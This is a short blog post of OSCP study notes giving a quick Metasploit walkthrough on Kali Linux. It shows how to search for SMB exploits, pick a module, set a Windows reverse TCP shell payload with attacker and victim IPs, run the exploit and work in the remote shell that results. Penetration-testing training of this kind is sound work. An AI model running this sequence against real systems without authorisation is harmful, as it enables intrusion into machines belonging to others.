Quick Metasploit Guide

metasploit photoThese are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.

Use Kali Linux for all the following instructions.

Prep:
Ensure postgresql is running.

$> /etc/init.d/postgresql start

Set postgres to start on boot so you don’t have to worry about it again:
$> sudo update-rc.d postgresql enable

From the command line, fire up the Metasploit console:
$> msfconsole

Search for exploits related to what you are interested in:
msf> search smb

Or, be more specific:
msf> search name:smb type:exploit platform:windows

Or, in Kali, use searchsploit (from regular command line, outside of MSF):
$> searchsploit smb

Once you find an exploit you want to use, use it:
msf> use exploit/windows/smb_hack

Then set a payload:
msf> set PAYLOAD windows/shell/reverse_tcp

See what options are set:
msf> show options

Set options as needed:

LHOST is the IP of where the victim host will send info to (your Kali VM, ex.)

msf> set LHOST 192.168.0.x

RHOST is the IP of the victim
msf> set RHOST 192.168.1.x

Default port is 80, but choose one if you wish:
msf> set RPORT 8081

Run the exploit:
msf> exploit

If trying to get a remote shell, beware that you may be looking at it if you see what you think is nothing happening. Just try executing a command and see what happens:
ls

dir

pwd

id

Photos by Christiaan008,

About Will Chatham

Will Chatham is a Cyber Security Analyst, Ethical Hacker, and Penetration Tester at a data center in Asheville, NC. Since Netscape 2.0, he has worked in a wide array of environments including non-profit, corporate, small business, and government. His varied background, from developer to search engine optimizer to security professional, has helped him build a wide range of skills that help those with whom he works and teaches.
Bookmark the permalink.

Leave a Reply